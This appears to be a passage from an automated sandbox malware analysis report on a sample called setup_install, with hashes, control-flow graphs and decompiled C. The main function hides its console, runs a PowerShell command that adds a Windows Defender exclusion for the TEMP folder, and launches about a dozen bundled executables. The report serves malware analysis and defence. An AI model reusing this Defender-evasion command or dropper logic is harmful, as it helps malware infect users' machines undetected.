                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_init
                                                                                                                            • String ID: `=J
                                                                                                                            • API String ID: 1091013307-1266151938
                                                                                                                            • Opcode ID: 926c407d094e297614dce0a5a36bef9ad4d7d7fbed650e4765b5d34a5ab90c84
                                                                                                                            • Instruction ID: bf91be455803ac727e9f4f9ca3a7044ccac7015cb553c69d20f488215b4ee7f5
                                                                                                                            • Opcode Fuzzy Hash: 926c407d094e297614dce0a5a36bef9ad4d7d7fbed650e4765b5d34a5ab90c84
                                                                                                                            • Instruction Fuzzy Hash: E01149B15092008FEB00AF25D84931A7BE0BB5134CF55C5BEE5889B395D77DD4488F9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 778 404935-40493b 779 404941-404963 778->779 780 497c0a-497c3a 778->780 779->780 784 497c3c call 495e30 780->784 785 497c41-497c4e call 40f8e0 780->785 784->785 790 497c50 call 495e30 785->790 791 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 785->791 790->791 795 497cb8-497ccc 791->795 796 497c96-497ca1 791->796 797 497ca8-497cb7 call 4014c0 795->797 796->797
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_init
                                                                                                                            • String ID: <=J
                                                                                                                            • API String ID: 1091013307-785458646
                                                                                                                            • Opcode ID: cb7a0ab00dd3be68017115a1ea2bb517430d745f56fb7d8548414fd8ad053c34
                                                                                                                            • Instruction ID: 17aa8cd9b33031238bbac21bb84e0ae2292b80547ef7828807b7bb6760d04223
                                                                                                                            • Opcode Fuzzy Hash: cb7a0ab00dd3be68017115a1ea2bb517430d745f56fb7d8548414fd8ad053c34
                                                                                                                            • Instruction Fuzzy Hash: 8F1136B15092008FEB00AF25E44931A7FE0FB51348F55C5BEE4889B7A6D77DD4488B9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404765 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 800 404765-40476b 801 404771-404793 800->801 802 497c25-497c3a 800->802 801->802 804 497c3c call 495e30 802->804 805 497c41-497c4e call 40f8e0 802->805 804->805 810 497c50 call 495e30 805->810 811 497c55-497c94 call 40f8e0 pthread_mutex_init malloc 805->811 810->811 815 497cb8-497ccc 811->815 816 497c96-497ca1 811->816 817 497ca8-497cb7 call 4014c0 815->817 816->817
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_init
                                                                                                                            • String ID: r=J
                                                                                                                            • API String ID: 1091013307-1423279388
                                                                                                                            • Opcode ID: b0a5ff1bfbd59f3de95253626a51d8107e075b9ac34b735c85aff4278033d301
                                                                                                                            • Instruction ID: 96c914c144f0a33d253df8efbe401a24c5085ae494439f54e453a4dae00a1d2a
                                                                                                                            • Opcode Fuzzy Hash: b0a5ff1bfbd59f3de95253626a51d8107e075b9ac34b735c85aff4278033d301
                                                                                                                            • Instruction Fuzzy Hash: 6E1179B04092008FEB00AF21E44531A7FE1BB51348F55C4BED5889B756D77ED4448BAE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404200 Relevance: 3.4, APIs: 2, Instructions: 442COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 34f8b224a604f6d7da1c32fafd1da2549b902ef5144775f96f91fb45f411445a
                                                                                                                            • Instruction ID: 5ed01a459364bd99f4480ad681dbdadea355dd0258783eaf9a0ca7d2ae9cb1c4
                                                                                                                            • Opcode Fuzzy Hash: 34f8b224a604f6d7da1c32fafd1da2549b902ef5144775f96f91fb45f411445a
                                                                                                                            • Instruction Fuzzy Hash: 86F160F0B042018FDB04DF29D48071ABBE1AB84344F1485BEE989AF396D77DD9468F99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404869 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: mallocpthread_mutex_init
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1091013307-0
                                                                                                                            • Opcode ID: 939e577137b81c78a677e00bf854f32ed46d5ec7ed1db9354bf5a2c0b191c757
                                                                                                                            • Instruction ID: 1ad138f92009953cf84111b3c3279cfdbfcd12916f6d81b2437cdf598675d89a
                                                                                                                            • Opcode Fuzzy Hash: 939e577137b81c78a677e00bf854f32ed46d5ec7ed1db9354bf5a2c0b191c757
                                                                                                                            • Instruction Fuzzy Hash: C0318FB15082008FE700EF35D44571ABBE1BF80348F44C5BAE488AB396D37DD545DB99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401637 Relevance: 55.0, APIs: 15, Strings: 16, Instructions: 794COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 401637-401d34 call 40c4c0 FindWindowA getenv call 457790 call 485230 call 493fb4 call 493f80 call 485850 * 2 call 4577c0 call 429480 _popen call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 457790 call 485230 call 4577c0 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 174 401d43-401dab call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 0->174 175 401d36-401d3e 0->175 186 401dba-401e22 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 174->186 187 401dad-401db5 174->187 175->174 198 401e31-401e99 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 186->198 199 401e24-401e2c 186->199 187->186 210 401ea8-401f10 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 198->210 211 401e9b-401ea3 198->211 199->198 222 401f12-401f1a 210->222 223 401f1f-401f87 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 210->223 211->210 222->223 234 401f96-401ffe call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 223->234 235 401f89-401f91 223->235 246 402000-402008 234->246 247 40200d-402075 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 234->247 235->234 246->247 258 402084-4020ec call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 247->258 259 402077-40207f 247->259 270 4020fb-402163 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 258->270 271 4020ee-4020f6 258->271 259->258 282 402172-4021d1 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 270->282 283 402165-40216d 270->283 271->270 294 4021e0-402238 call 4940a0 call 429480 _popen call 485850 call 429480 call 4015c0 282->294 295 4021d3-4021db 282->295 283->282 305 40223d-40223f 294->305 295->294 306 402241-402249 305->306 307 40224e-4028e0 call 485850 * 25 305->307 306->307
                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E00401637(char _a4) {
				void* _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v96;
				char _v120;
				char _v144;
				char _v168;
				char _v192;
				char _v216;
				char _v240;
				char _v264;
				char _v288;
				char _v312;
				char _v336;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v412;
				char _v436;
				char _v460;
				char _v484;
				char _v508;
				char _v532;
				char _v556;
				char _v580;
				char _v604;
				char _v628;
				char _v652;
				char _v676;
				char _v700;
				char _v724;
				char _v748;
				char _v772;
				char _v796;
				char _v820;
				char _v844;
				char _v868;
				char _v892;
				char _v916;
				char _v940;
				char _v964;
				char _v988;
				char _v1012;
				char _v1036;
				intOrPtr _v1052;
				char* _v1060;
				void* _v1064;
				char _v1068;
				char _v1076;
				char _v1084;
				char _v1092;
				char _v1100;
				char _v1108;
				char _v1116;
				char _v1124;
				char _v1132;
				char _v1140;
				char _v1148;
				void* _v1156;
				char _v1164;
				char _v1172;
				char _v1180;
				char _v1188;
				char _v1196;
				char _v1204;
				char _v1212;
				char _v1220;
				char _v1228;
				char _v1236;
				char _v1244;
				void* _v1252;
				char* _v1256;
				char _v1260;
				void* __ebx;
				struct HWND__* _t294;
				struct HWND__* _t313;
				struct _IO_FILE* _t315;
				char _t463;
				struct _IO_FILE* _t465;
				void* _t470;
				char _t474;
				struct _IO_FILE* _t476;
				void* _t481;
				char _t485;
				struct _IO_FILE* _t487;
				void* _t492;
				char _t496;
				struct _IO_FILE* _t498;
				void* _t503;
				char _t507;
				struct _IO_FILE* _t509;
				void* _t514;
				char _t518;
				struct _IO_FILE* _t520;
				void* _t525;
				char _t529;
				struct _IO_FILE* _t531;
				void* _t536;
				char _t540;
				struct _IO_FILE* _t542;
				void* _t547;
				char _t551;
				struct _IO_FILE* _t553;
				void* _t558;
				char _t562;
				struct _IO_FILE* _t564;
				void* _t569;
				char _t573;
				struct _IO_FILE* _t575;
				void* _t580;
				char _t584;
				struct _IO_FILE* _t586;
				void* _t591;
				intOrPtr _t646;
				intOrPtr _t648;
				intOrPtr _t650;
				intOrPtr _t652;
				intOrPtr _t654;
				intOrPtr _t656;
				intOrPtr _t658;
				intOrPtr _t660;
				intOrPtr _t662;
				intOrPtr _t664;
				intOrPtr _t666;
				CHAR* _t667;
				void* _t863;
				void* _t864;
				struct HWND__* _t865;
				signed int _t868;
				signed int _t869;
				intOrPtr* _t870;
				struct HWND__** _t871;
				struct HWND__** _t873;
				void* _t874;
				void* _t875;
				void* _t876;
				void* _t877;
				void* _t878;
				void* _t879;
				void* _t880;
				void* _t881;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t885;
				void* _t886;
				void* _t887;
				void* _t888;
				void* _t889;
				void* _t890;
				void* _t891;
				void* _t892;
				void* _t893;
				void* _t894;
				void* _t895;
				void* _t896;
				void* _t897;
				intOrPtr _t902;
				intOrPtr _t904;
				intOrPtr _t906;
				intOrPtr _t908;
				intOrPtr _t910;
				intOrPtr _t912;
				intOrPtr _t914;
				intOrPtr _t916;
				intOrPtr _t918;
				intOrPtr _t920;
				intOrPtr _t922;

				_t670 =  &_a4;
				_t869 = _t868 & 0xfffffff0;
				_t900 = _t869;
				_t2 = _t670 - 4; // 0x2ac
				_t870 = _t869 - 0x410;
				E0040C4C0();
				_v1052 = 0;
				 *_t870 = "ConsoleWindowClass";
				_t294 = FindWindowA( &_a4, _t667); // executed
				_t871 = _t870 - 8;
				_v1052 = 0;
				 *_t871 = _t294;
				ShowWindow(_t865,  *_t2); // executed
				_v20 = getenv("TEMP");
				E00457790( &_v385);
				_v1060 =  &_v385;
				_v1064 = _v20;
				E00485230( &_v412);
				_t873 = _t871;
				_v1064 =  &_v412;
				_v1068 = "powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath  \"";
				 *_t873 =  &_v436;
				L00493FB4(_t667, _t863, _t864, _t869);
				_v1064 = 0x4a10cc;
				_v1068 =  &_v436;
				 *_t873 =  &_v460;
				L00493F80();
				E00485850( &_v436);
				E00485850( &_v412);
				E004577C0( &_v385);
				_t313 = E00429480( &_v460);
				_v1068 = 0x4a10ce;
				 *_t873 = _t313;
				_t315 = _popen(??, ??); // executed
				_v24 = _t315;
				E00457790( &_v384);
				_v1064 =  &_v384;
				_v1068 = "6282924fea1c3_82ebfc59.exe";
				E00485230( &_v484);
				_t874 = _t873 - 8;
				E004577C0( &_v384);
				E00457790( &_v383);
				 *((intOrPtr*)(_t874 + 4)) =  &_v383;
				_v1076 = 0x4a10eb;
				E00485230( &_v508);
				_t875 = _t874 - 8;
				E004577C0( &_v383);
				E00457790( &_v382);
				 *((intOrPtr*)(_t875 + 4)) =  &_v382;
				_v1084 = "628292505a6c3_91a0215e.exe";
				E00485230( &_v532);
				_t876 = _t875 - 8;
				E004577C0( &_v382);
				E00457790( &_v381);
				 *((intOrPtr*)(_t876 + 4)) =  &_v381;
				_v1092 = 0x4a10eb;
				E00485230( &_v556);
				_t877 = _t876 - 8;
				E004577C0( &_v381);
				E00457790( &_v380);
				 *((intOrPtr*)(_t877 + 4)) =  &_v380;
				_v1100 = "62829251169ea_9dc91d.exe";
				E00485230( &_v580);
				_t878 = _t877 - 8;
				E004577C0( &_v380);
				E00457790( &_v379);
				 *((intOrPtr*)(_t878 + 4)) =  &_v379;
				_v1108 = 0x4a10eb;
				E00485230( &_v604);
				_t879 = _t878 - 8;
				E004577C0( &_v379);
				E00457790( &_v378);
				 *((intOrPtr*)(_t879 + 4)) =  &_v378;
				_v1116 = "62829252dc457_91e450cbce.exe";
				E00485230( &_v628);
				_t880 = _t879 - 8;
				E004577C0( &_v378);
				E00457790( &_v377);
				 *((intOrPtr*)(_t880 + 4)) =  &_v377;
				_v1124 = 0x4a10eb;
				E00485230( &_v652);
				_t881 = _t880 - 8;
				E004577C0( &_v377);
				E00457790( &_v376);
				 *((intOrPtr*)(_t881 + 4)) =  &_v376;
				_v1132 = "62829254ab49d_fc210c4a.exe";
				E00485230( &_v676);
				_t882 = _t881 - 8;
				E004577C0( &_v376);
				E00457790( &_v375);
				 *((intOrPtr*)(_t882 + 4)) =  &_v375;
				_v1140 = 0x4a10eb;
				E00485230( &_v700);
				_t883 = _t882 - 8;
				E004577C0( &_v375);
				E00457790( &_v374);
				 *((intOrPtr*)(_t883 + 4)) =  &_v374;
				_v1148 = "6282925776f05_4ee107b.exe";
				E00485230( &_v724);
				_t884 = _t883 - 8;
				E004577C0( &_v374);
				E00457790( &_v373);
				 *((intOrPtr*)(_t884 + 4)) =  &_v373;
				_v1156 = 0x4a10eb;
				E00485230( &_v748);
				_t885 = _t884 - 8;
				E004577C0( &_v373);
				E00457790( &_v372);
				 *((intOrPtr*)(_t885 + 4)) =  &_v372;
				_v1164 = "62829258f111c_8df26f0c7d.exe";
				E00485230( &_v772);
				_t886 = _t885 - 8;
				E004577C0( &_v372);
				E00457790( &_v371);
				 *((intOrPtr*)(_t886 + 4)) =  &_v371;
				_v1172 = " /mixtwo";
				E00485230( &_v796);
				_t887 = _t886 - 8;
				E004577C0( &_v371);
				E00457790( &_v370);
				 *((intOrPtr*)(_t887 + 4)) =  &_v370;
				_v1180 = "6282925ab52f1_fdd12e5.exe";
				E00485230( &_v820);
				_t888 = _t887 - 8;
				E004577C0( &_v370);
				E00457790( &_v369);
				 *((intOrPtr*)(_t888 + 4)) =  &_v369;
				_v1188 = 0x4a10eb;
				E00485230( &_v844);
				_t889 = _t888 - 8;
				E004577C0( &_v369);
				E00457790( &_v368);
				 *((intOrPtr*)(_t889 + 4)) =  &_v368;
				_v1196 = "6282925b8abce_97dd7946.exe";
				E00485230( &_v868);
				_t890 = _t889 - 8;
				E004577C0( &_v368);
				E00457790( &_v367);
				 *((intOrPtr*)(_t890 + 4)) =  &_v367;
				_v1204 = 0x4a10eb;
				E00485230( &_v892);
				_t891 = _t890 - 8;
				E004577C0( &_v367);
				E00457790( &_v366);
				 *((intOrPtr*)(_t891 + 4)) =  &_v366;
				_v1212 = "6282925c504be_44b654a9fe.exe";
				E00485230( &_v916);
				_t892 = _t891 - 8;
				E004577C0( &_v366);
				E00457790( &_v365);
				 *((intOrPtr*)(_t892 + 4)) =  &_v365;
				_v1220 = 0x4a10eb;
				E00485230( &_v940);
				_t893 = _t892 - 8;
				E004577C0( &_v365);
				E00457790( &_v364);
				 *((intOrPtr*)(_t893 + 4)) =  &_v364;
				_v1228 = "6282925d5ee10_0da12a.exe";
				E00485230( &_v964);
				_t894 = _t893 - 8;
				E004577C0( &_v364);
				E00457790( &_v363);
				 *((intOrPtr*)(_t894 + 4)) =  &_v363;
				_v1236 = 0x4a10eb;
				E00485230( &_v988);
				_t895 = _t894 - 8;
				E004577C0( &_v363);
				E00457790( &_v362);
				 *((intOrPtr*)(_t895 + 4)) =  &_v362;
				_v1244 = "6282925ea53e7_da60dc03.exe";
				E00485230( &_v1012);
				_t896 = _t895 - 8;
				E004577C0( &_v362);
				E00457790( &_v361);
				 *((intOrPtr*)(_t896 + 4)) =  &_v361;
				_v1252 = 0x4a10eb;
				E00485230( &_v1036);
				_t897 = _t896 - 8;
				E004577C0( &_v361);
				_v1252 =  &_v508;
				_v1256 =  &_v484;
				_v1260 =  &_v360;
				E004940A0(_t667, _t900);
				_t463 = E00429480( &_v360);
				_v1256 = 0x4a10ce;
				_v1260 = _t463;
				_t465 = _popen(??, ??); // executed
				_v28 = _t465;
				E00485850( &_v360);
				_v1260 = E00429480( &_v484); // executed
				_t470 = E004015C0(_t667, _t900); // executed
				if(_t470 != 0) {
					_t666 =  *0x4e5038 + 1;
					_t902 = _t666;
					 *0x4e5038 = _t666;
				}
				_v1156 =  &_v556;
				 *((intOrPtr*)(_t897 + 4)) =  &_v532;
				_v1164 =  &_v336;
				E004940A0(_t667, _t902);
				_t474 = E00429480( &_v336);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t474;
				_t476 = _popen(??, ??); // executed
				_v32 = _t476;
				E00485850( &_v336);
				_t481 = E004015C0(_t667, _t902, E00429480( &_v532)); // executed
				if(_t481 != 0) {
					_t664 =  *0x4e5038 + 1;
					_t904 = _t664;
					 *0x4e5038 = _t664;
				}
				_v1156 =  &_v604;
				 *((intOrPtr*)(_t897 + 4)) =  &_v580;
				_v1164 =  &_v312;
				E004940A0(_t667, _t904);
				_t485 = E00429480( &_v312);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t485;
				_t487 = _popen(??, ??); // executed
				_v36 = _t487;
				E00485850( &_v312);
				_t492 = E004015C0(_t667, _t904, E00429480( &_v580)); // executed
				if(_t492 != 0) {
					_t662 =  *0x4e5038 + 1;
					_t906 = _t662;
					 *0x4e5038 = _t662;
				}
				_v1156 =  &_v652;
				 *((intOrPtr*)(_t897 + 4)) =  &_v628;
				_v1164 =  &_v288;
				E004940A0(_t667, _t906);
				_t496 = E00429480( &_v288);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t496;
				_t498 = _popen(??, ??); // executed
				_v40 = _t498;
				E00485850( &_v288);
				_t503 = E004015C0(_t667, _t906, E00429480( &_v628)); // executed
				if(_t503 != 0) {
					_t660 =  *0x4e5038 + 1;
					_t908 = _t660;
					 *0x4e5038 = _t660;
				}
				_v1156 =  &_v700;
				 *((intOrPtr*)(_t897 + 4)) =  &_v676;
				_v1164 =  &_v264;
				E004940A0(_t667, _t908);
				_t507 = E00429480( &_v264);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t507;
				_t509 = _popen(??, ??); // executed
				_v44 = _t509;
				E00485850( &_v264);
				_t514 = E004015C0(_t667, _t908, E00429480( &_v676)); // executed
				if(_t514 != 0) {
					_t658 =  *0x4e5038 + 1;
					_t910 = _t658;
					 *0x4e5038 = _t658;
				}
				_v1156 =  &_v748;
				 *((intOrPtr*)(_t897 + 4)) =  &_v724;
				_v1164 =  &_v240;
				E004940A0(_t667, _t910);
				_t518 = E00429480( &_v240);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t518;
				_t520 = _popen(??, ??); // executed
				_v48 = _t520;
				E00485850( &_v240);
				_t525 = E004015C0(_t667, _t910, E00429480( &_v724)); // executed
				if(_t525 != 0) {
					_t656 =  *0x4e5038 + 1;
					_t912 = _t656;
					 *0x4e5038 = _t656;
				}
				_v1156 =  &_v796;
				 *((intOrPtr*)(_t897 + 4)) =  &_v772;
				_v1164 =  &_v216;
				E004940A0(_t667, _t912);
				_t529 = E00429480( &_v216);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t529;
				_t531 = _popen(??, ??); // executed
				_v52 = _t531;
				E00485850( &_v216);
				_t536 = E004015C0(_t667, _t912, E00429480( &_v772)); // executed
				if(_t536 != 0) {
					_t654 =  *0x4e5038 + 1;
					_t914 = _t654;
					 *0x4e5038 = _t654;
				}
				_v1156 =  &_v844;
				 *((intOrPtr*)(_t897 + 4)) =  &_v820;
				_v1164 =  &_v192;
				E004940A0(_t667, _t914);
				_t540 = E00429480( &_v192);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t540;
				_t542 = _popen(??, ??); // executed
				_v56 = _t542;
				E00485850( &_v192);
				_t547 = E004015C0(_t667, _t914, E00429480( &_v820)); // executed
				if(_t547 != 0) {
					_t652 =  *0x4e5038 + 1;
					_t916 = _t652;
					 *0x4e5038 = _t652;
				}
				_v1156 =  &_v892;
				 *((intOrPtr*)(_t897 + 4)) =  &_v868;
				_v1164 =  &_v168;
				E004940A0(_t667, _t916);
				_t551 = E00429480( &_v168);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t551;
				_t553 = _popen(??, ??); // executed
				_v60 = _t553;
				E00485850( &_v168);
				_t558 = E004015C0(_t667, _t916, E00429480( &_v868)); // executed
				if(_t558 != 0) {
					_t650 =  *0x4e5038 + 1;
					_t918 = _t650;
					 *0x4e5038 = _t650;
				}
				_v1156 =  &_v940;
				 *((intOrPtr*)(_t897 + 4)) =  &_v916;
				_v1164 =  &_v144;
				E004940A0(_t667, _t918);
				_t562 = E00429480( &_v144);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t562;
				_t564 = _popen(??, ??); // executed
				_v64 = _t564;
				E00485850( &_v144);
				_t569 = E004015C0(_t667, _t918, E00429480( &_v916)); // executed
				if(_t569 != 0) {
					_t648 =  *0x4e5038 + 1;
					_t920 = _t648;
					 *0x4e5038 = _t648;
				}
				_v1156 =  &_v988;
				 *((intOrPtr*)(_t897 + 4)) =  &_v964;
				_v1164 =  &_v120;
				E004940A0(_t667, _t920);
				_t573 = E00429480( &_v120);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t573;
				_t575 = _popen(??, ??); // executed
				_v68 = _t575;
				E00485850( &_v120);
				_t580 = E004015C0(_t667, _t920, E00429480( &_v964)); // executed
				if(_t580 != 0) {
					_t646 =  *0x4e5038 + 1;
					_t922 = _t646;
					 *0x4e5038 = _t646;
				}
				_v1156 =  &_v1036;
				 *((intOrPtr*)(_t897 + 4)) =  &_v1012;
				_v1164 =  &_v96;
				E004940A0(_t667, _t922);
				_t584 = E00429480( &_v96);
				 *((intOrPtr*)(_t897 + 4)) = 0x4a10ce;
				_v1164 = _t584;
				_t586 = _popen(??, ??); // executed
				_v72 = _t586;
				E00485850( &_v96);
				_t591 = E004015C0(_t667, _t922, E00429480( &_v1012)); // executed
				if(_t591 != 0) {
					 *0x4e5038 =  *0x4e5038 + 1;
				}
				E00485850( &_v1036);
				E00485850( &_v1012);
				E00485850( &_v988);
				E00485850( &_v964);
				E00485850( &_v940);
				E00485850( &_v916);
				E00485850( &_v892);
				E00485850( &_v868);
				E00485850( &_v844);
				E00485850( &_v820);
				E00485850( &_v796);
				E00485850( &_v772);
				E00485850( &_v748);
				E00485850( &_v724);
				E00485850( &_v700);
				E00485850( &_v676);
				E00485850( &_v652);
				E00485850( &_v628);
				E00485850( &_v604);
				E00485850( &_v580);
				E00485850( &_v556);
				E00485850( &_v532);
				E00485850( &_v508);
				E00485850( &_v484);
				E00485850( &_v460);
				return 0;
			}














































































































































































































                                                                                                                            0x00401637
                                                                                                                            0x0040163b
                                                                                                                            0x0040163b
